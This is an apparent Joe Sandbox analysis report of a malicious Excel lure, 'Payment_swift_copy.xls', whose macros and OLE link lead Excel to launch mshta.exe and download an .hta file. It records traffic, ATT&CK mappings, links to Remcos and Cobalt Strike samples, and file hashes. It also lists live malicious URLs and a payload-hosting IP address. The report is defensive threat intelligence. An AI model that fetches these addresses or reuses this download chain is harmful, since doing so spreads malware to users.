Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.3.122.159:80 -> 192.168.2.25:49730
Source: global trafficTCP traffic: 192.168.2.25:49730 -> 192.3.122.159:80
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49729
Source: global trafficTCP traffic: 192.168.2.25:49729 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: global traffic; HTTP traffic detected: GET /SEyYcvw9Ev?&timeline=adorable&female HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: curt.wiz.co Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Host: 192.3.122.159
Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown; TCP traffic detected without corresponding DNS query: 192.3.122.159
Source: global traffic; HTTP traffic detected: GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro) Host: otelrules.svc.static.microsoft
Source: global traffic; HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro) Host: otelrules.svc.static.microsoft
Source: global traffic; DNS traffic detected: DNS query: curt.wiz.co
Source: global traffic; DNS traffic detected: DNS query: assets.msn.com
Source: Payment_swift_copy.xls, CBD20000.0.dr; String found in binary or memory: https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female
Source: Primary1734339924280557900_98182420-D459-4EDE-B647-164EC7990E8A.log.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626/en-US/en-CH.en-GB.en-US.fr-FR/Me
Source: Primary1734339924280557900_98182420-D459-4EDE-B647-164EC7990E8A.log.0.dr; String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknown; Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown; HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49729 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49747 version: TLS 1.2

System Summary

Source: Payment_swift_copy.xls; OLE: Microsoft Excel 2007+
Source: ~DF751F6CF890A39BEC.TMP.0.dr; OLE: Microsoft Excel 2007+
Source: ~DF09428153E9B4179E.TMP.0.dr; OLE: Microsoft Excel 2007+
Source: CBD20000.0.dr; OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\clearentirethingwithbestnoticetheeverythinggooodfrome[1].hta
Source: Payment_swift_copy.xls; OLE indicator, VBA macros: true
Source: CBD20000.0.dr; OLE indicator, VBA macros: true
Source: Payment_swift_copy.xls; Stream path 'MBD00CB2B2D/\x1Ole' : https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female
Source: CBD20000.0.dr; Stream path 'MBD00CB2B2D/\x1Ole' : https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female
Source: ~DF751F6CF890A39BEC.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF09428153E9B4179E.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine; Classification label: mal76.expl.winXLS@8/39@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\37A42BC5.emf
Source: C:\Windows\System32\conhost.exe; Mutant created: \BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\appidpolicyconverter.exe; Mutant created: PolicyMutex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{98182420-D459-4EDE-B647-164EC7990E8A} - OProcSessId.dat
Source: Payment_swift_copy.xls; OLE indicator, Workbook stream: true
Source: CBD20000.0.dr; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\appidpolicyconverter.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Payment_swift_copy.xls; ReversingLabs: Detection: 21%
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknown; Process created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls"
Source: C:\Windows\System32\appidpolicyconverter.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\appidpolicyconverter.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\appidpolicyconverter.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\appidpolicyconverter.exe; Section loaded: srpapi.dll
Source: C:\Windows\System32\appidpolicyconverter.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: c2r64.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: vcruntime140.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: msvcp140.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: Payment_swift_copy.xls; Static file information: File size 1096192 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: ~DF751F6CF890A39BEC.TMP.0.dr; Initial sample: OLE indicators vbamacros = False
Source: Payment_swift_copy.xls; Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: Payment_swift_copy.xls, Stream path 'MBD00CB2B2B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: Payment_swift_copy.xls, Stream path 'Workbook' entropy: 7.99875231323 (max. 8.0)
Source: CBD20000.0.dr, Stream path 'MBD00CB2B2B/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: CBD20000.0.dr, Stream path 'Workbook' entropy: 7.97851159845 (max. 8.0)
Source: C:\Windows\splwow64.exe, Window / User API: threadDelayed 809
Source: C:\Windows\splwow64.exe, Last function: Thread delayed
Source: C:\Windows\splwow64.exe, Thread delayed: delay time: 120000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Process information queried: ProcessInformation
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At; Cron; Launchd
Persistence: Scripting (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Masquerading (3); Virtualization/Sandbox Evasion (1); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Process Discovery (1); Virtualization/Sandbox Evasion (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (2)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Email Collection (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label | Link
Payment_swift_copy.xls | 21% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
curt.wiz.co.cdn.gocache.net | 170.82.173.30 | true | false | | unknown
assets.msn.com | unknown | unknown | false | | high
curt.wiz.co | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundle | false | | high
https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female | false | Avira URL Cloud: malware | unknown
https://otelrules.svc.static.microsoft/rules/officeclicktorun.exe-Production-v19.bundle | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
13.107.246.63 | unknown | United States | | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
192.3.122.159 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | false
170.82.173.30 | curt.wiz.co.cdn.gocache.net | Brazil | | 266444 | 3LCLOUDINTERNETSERVICESLTDA-EPPBR | false
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1575764
            Start date and time:2024-12-16 10:04:12 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 13s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
            Run name:Potential for more IOCs and behavior
            Number of analysed new started processes analysed:35
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Payment_swift_copy.xls
            Detection:MAL
            Classification:mal76.expl.winXLS@8/39@2/3
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.109.76.240, 104.126.37.9, 104.126.36.248, 52.113.194.132, 52.111.236.73, 52.109.124.141, 20.50.201.201, 104.126.37.192, 104.126.37.195, 104.126.37.194, 104.126.37.209, 104.126.36.40, 104.126.37.211, 104.126.36.41, 104.126.37.208, 104.126.37.200, 184.30.24.41, 20.189.173.27, 4.175.87.197, 20.190.177.83, 20.223.35.26, 20.199.58.43
            • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, onedscolprdweu07.westeurope.cloudapp.azure.com, tse1.mm.bing.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, osiprod-sea-bronze-azsc-000.southeastasia.cloudapp.azure.com, login.live.com, otelrules.svc.static.microsoft, onedscolprdwus21.westus.cloudapp.azure.com, officeclient.microsoft.com, asia.odcsm1.live.com.akadns.net, e28578.d.akamaiedge.net, res-1-tls.cdn.office.net, enrichment.osi.office.net, e40491.dscg.akamaiedge.net, ecs.office.com, assets.msn.com.edgekey.net, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, sea-azsc-000.odc.officeapps.live.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, config.officeapps.live.com, res.public.onecdn.static.micros
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadFile calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Report size getting too big, too many NtSetValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: Payment_swift_copy.xls
Time | Type | Description
04:06:25 | API Interceptor | 927x Sleep call for process: splwow64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.246.63 | Contract Proposal Documents.pdf | malicious | Unknown | assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/645a21a8-32ac-ef11-b8e8-6045bd0f229c
192.3.122.159 | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF
192.3.122.159 | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF
170.82.173.30 | eQcKjYOV30.exe | malicious | Pushdo | www.mqs.com.br/
170.82.173.30 | file.exe | malicious | Pushdo, DanaBot, SmokeLoader | www.mqs.com.br/
170.82.173.30 | file.exe | malicious | Pushdo, SmokeLoader | www.mqs.com.br/
170.82.173.30 | file.exe | malicious | Pushdo, SmokeLoader | www.mqs.com.br/
170.82.173.30 | 0fmEh2zmDj.exe | malicious | Pushdo | www.mqs.com.br/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
curt.wiz.co.cdn.gocache.net | Statement Of Account - (USD 19,490.00 ).xls | malicious | Unknown | 170.82.174.30
curt.wiz.co.cdn.gocache.net | NB PO-104105107108.xls | malicious | Unknown | 170.82.173.30
curt.wiz.co.cdn.gocache.net | Inquiry_0476452.xls | malicious | Remcos | 170.82.174.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | Statement Of Account - (USD 19,490.00 ).xls | malicious | Unknown | 23.95.235.29
AS-COLOCROSSINGUS | givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 192.3.122.159
AS-COLOCROSSINGUS | clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 192.3.122.159
AS-COLOCROSSINGUS | sh4.elf | malicious | Unknown | 107.172.24.189
AS-COLOCROSSINGUS | requests-pdf.exe | malicious | Remcos | 198.23.227.212
AS-COLOCROSSINGUS | NB PO-104105107108.xls | malicious | Unknown | 23.95.235.29
AS-COLOCROSSINGUS | jOlYP2b2P4.elf | malicious | Xmrig | 107.172.43.186
AS-COLOCROSSINGUS | smb.ps1 | malicious | Xmrig | 107.172.43.186
AS-COLOCROSSINGUS | AI7f43Z7AC.exe | malicious | Unknown | 107.172.88.151
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91 | malicious | HTMLPhisher | 52.108.186.5
MICROSOFT-CORP-MSN-AS-BLOCKUS | attachment.eml | malicious | Unknown | 52.109.68.129
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm5.elf | malicious | Unknown | 21.103.49.15
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm.elf | malicious | Unknown | 52.182.137.67
MICROSOFT-CORP-MSN-AS-BLOCKUS | sh4.elf | malicious | Unknown | 13.95.41.206
MICROSOFT-CORP-MSN-AS-BLOCKUS | ppc.elf | malicious | Unknown | 40.70.164.136
MICROSOFT-CORP-MSN-AS-BLOCKUS | mips.elf | malicious | Unknown | 52.121.36.55
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm6.elf | malicious | Unknown | 40.122.203.222
MICROSOFT-CORP-MSN-AS-BLOCKUS | m68k.elf | malicious | Unknown | 52.186.170.135
MICROSOFT-CORP-MSN-AS-BLOCKUS | arm7.elf | malicious | Unknown | 22.32.74.84
            No context
            No context
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):118
            Entropy (8bit):3.5700810731231707
            Encrypted:false
            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
            MD5:573220372DA4ED487441611079B623CD
            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:JSON data
            Category:dropped
            Size (bytes):6469
            Entropy (8bit):5.328754972255714
            Encrypted:false
            SSDEEP:96:WctuNOYd9Dq8SCE0oMctcAN/NSZDecUdBBn010nX:huU/VrcAdNPdBBn010X
            MD5:E7182175D0E4FF09C53CDA6183228B4C
            SHA1:192F2B770F747022A9F4057DFD27281237AE7FBA
            SHA-256:E0CBF3738FBF376FD8876603A45FCFACB58FE68A47B34680CB9BE643ABBA26C7
            SHA-512:8EAACB41F243578B022454D3C2D67F4890DD5721EE86F77EB55BED3C55E398DFE399338D383C600FF0BC518B48F33D8B4242A396C0768921119F77D31471B502
            Malicious:false
            Reputation:low
            Preview:{"Domains":[{"Id":268435456,"Name":"Stocks","FontLocator":"FinanceRibbon","CreateBatchSize":54,"RefreshBatchSize":200,"MaxTopBottomContextCellRows":2,"MaxLeftRightContextCellColumns":1,"SupportedMarkets":["en-GB","en-US","fr-FR"],"SupportedMarketsDisplayLanguage":["English","English","French"],"DataProvider":"Bing","Subdomains":[{"Id":268435457,"Name":"Stock","FontLocator":"Finance"},{"Id":268435458,"Name":"Bond","FontLocator":"Finance"},{"Id":268435459,"Name":"ETF","FontLocator":"Finance"},{"Id":268435460,"Name":"Index","FontLocator":"Finance"},{"Id":268435461,"Name":"MutualFund","FontLocator":"Finance"},{"Id":268435462,"Name":"Currency","FontLocator":"Finance"},{"Id":268435463,"Name":"Stock History","FontLocator":"Finance"},{"Id":268435464,"Name":"Future","FontLocator":"Finance"}],"IsTelemetry":false,"CellConfig":{"DisplayText":"UniqueName","ReadOnly":true},"EntityCardConfig":{"Title":"Name","Footer":"TBD","HeroImage":"Image","PrimaryFallbackList":["Name"],"SecondaryFallbackList":["P
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):134544
            Entropy (8bit):2.9527588414114754
            Encrypted:false
            SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
            MD5:83F48FDD46D3424E92E24E709EAB5960
            SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
            SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
            SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
            Malicious:false
            Reputation:low
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):8084
            Entropy (8bit):2.5551694039574895
            Encrypted:false
            SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
            MD5:721E8AAC81F0A6D4659831CB8194D668
            SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
            SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
            SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):149960
            Entropy (8bit):2.3635032143046404
            Encrypted:false
            SSDEEP:1536:ZHL1zttZQJYAkQDnGvVf1oLJknhmUI/FZKU:ffTU
            MD5:BE236B9EAA6807F18F8CEA449B2A1F99
            SHA1:B6210B972A2BBD0F064FB3C6445E2C6A51CAD047
            SHA-256:620D4E357AD4BA7B8C1259DA8CBBFB92C62698DE614806541E470C7ADE620033
            SHA-512:7D678B11CA39C48149DB66CF4C758808F99C190926F74EF293D24365F5D3817553C5E302C1422E6697B6E98E3B193BE24B4C8177A0D01EC04F1E357EAE73AD59
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):152108
            Entropy (8bit):2.360059885403749
            Encrypted:false
            SSDEEP:1536:bBwEotO4tU9MBFjvSO6E/cq9N6hvkFrRSYS:aO6S
            MD5:4CA59230F9D6D09A795465252057DFD3
            SHA1:32D9768DD55104FB95291EAC1FCB34A6E4C3469D
            SHA-256:C0583BEDCCF232CF705085DC44F98818DB0CDB6674A160B6511F5AC854BCA8EB
            SHA-512:9118B0D17805A452374530CD51AB9D7775960CE3765884648721526EF8B577BF21955BC8FA577E4983D0B6E1FCD1A50DD35CC04204354F78F8CC4C4B3DDAA126
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):98872
            Entropy (8bit):2.3147905270371765
            Encrypted:false
            SSDEEP:768:XOU4vnx1DW7ohBb66mQK4BTonxqQbApQK6c:+Xwc
            MD5:F53F71E570E920D3913A2409E0D66A1A
            SHA1:053B8885C3119D8DA7F89011364CE19C36DE5C8B
            SHA-256:75B6F7FE9C69E0559D930C2263972952AE2D3F9AFAF8D854971CE4830A567428
            SHA-512:FFA1BB2843BEE681ED9AB63BC9E580C37072D9A83C7DD8A0C688DBB50E4B2F1EC95C8397DCA631B9FDFE2FFBCB36D79435681C78E210DEE797F0CF25F0E78EDC
            Malicious:false
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):99352
            Entropy (8bit):2.3158027648425534
            Encrypted:false
            SSDEEP:768:hOk4vt1Dr7ohr86uA4K4BTonxqQbApQK6c:Uxwc
            MD5:5C0F792B289CBAED97B09A984FFF9B64
            SHA1:CE7C47BB0A1A65FEB5D82478A8B565C672CA2434
            SHA-256:A967B0F54AE3B4408ED75A7219EF8C8653D8D464F59865F286323DAE5B8EE1C9
